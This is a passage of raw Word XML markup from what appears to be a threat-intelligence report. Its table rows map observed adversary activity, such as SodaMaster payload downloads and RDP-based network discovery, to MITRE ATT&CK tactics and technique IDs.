              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31BF6ED8" w14:textId="53DC59E1" w:rsidR="00CF34FF" w:rsidRDefault="00CF34FF" w:rsidP="00CF34FF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00CF04FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="180C3055" w14:textId="77777777" w:rsidR="00CF34FF" w:rsidRPr="00B857D7" w:rsidRDefault="00CF34FF" w:rsidP="00CF34FF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26A6FAE2" w14:textId="207BC195" w:rsidR="00CF34FF" w:rsidRDefault="00CF34FF" w:rsidP="00CF34FF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EF366F2" w14:textId="46BE3F47" w:rsidR="00CF34FF" w:rsidRDefault="00CF34FF" w:rsidP="00CF34FF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AC1509F" w14:textId="4F9477C9" w:rsidR="00CF34FF" w:rsidRPr="008D6D8A" w:rsidRDefault="00CF34FF" w:rsidP="00CF34FF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Based on the analysis of the backdoor features of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SodaMaster</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> module, the purpose of this malware is also to download and execute payloads (DLL or shellcode)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA7544" w:rsidRPr="00B857D7" w14:paraId="040D9249" w14:textId="77777777" w:rsidTr="00021B7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DDD8552" w14:textId="76FF4E86" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46508350" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRPr="006621ED" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006511BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006511BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006511BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19CA7CD1" w14:textId="442821A9" w:rsidR="00DA7544" w:rsidRPr="00475254" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">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1135 ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Network Service</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08230EDC" w14:textId="3757E7D8" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="009C17AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43FDB27D" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRPr="00B857D7" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76B53176" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="203763B8" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07F95A65" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA7544">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Heavy usage of network discovery using RDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA7544" w:rsidRPr="00B857D7" w14:paraId="12714B1C" w14:textId="77777777" w:rsidTr="00021B7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FCE7455" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E51C61B" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRPr="006621ED" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006511BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006511BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006511BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0229E2F0" w14:textId="30E9F385" w:rsidR="00DA7544" w:rsidRPr="00475254" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA7544">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DA7544">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1049 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DA7544">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BF3BE99" w14:textId="6487B24F" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="009C17AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70E3A9E8" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRPr="00B857D7" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68FA0E35" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BFFFADE" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0647FAE8" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA7544">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Heavy usage of network discovery using RDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA7544" w:rsidRPr="00B857D7" w14:paraId="7144CA4D" w14:textId="77777777" w:rsidTr="00021B7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4437678B" w14:textId="7D1E074B" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C8C10CC" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRPr="006621ED" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006511BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006511BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006511BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="446D18A8" w14:textId="0F77E4EF" w:rsidR="00DA7544" w:rsidRPr="00475254" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA7544">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DA7544">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1016 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DA7544">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2857C7DD" w14:textId="08FA48A0" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="009C17AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A9B332A" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRPr="00B857D7" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F06AFD8" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E94C649" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C87D00A" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRDefault="00DA7544" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA7544">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Heavy usage of network discovery using RDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027472D" w:rsidRPr="00B857D7" w14:paraId="0BB8A5DE" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="766F2A47" w14:textId="2E5F4297" w:rsidR="0027472D" w:rsidRDefault="0027472D" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00DA7544">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21B5E3D3" w14:textId="18F611FD" w:rsidR="0027472D" w:rsidRPr="00B857D7" w:rsidRDefault="0027472D" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59F1DD35" w14:textId="331CCD4F" w:rsidR="0027472D" w:rsidRPr="00B857D7" w:rsidRDefault="0027472D" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EC02601" w14:textId="51618C67" w:rsidR="0027472D" w:rsidRDefault="0075689E" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00CF04FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
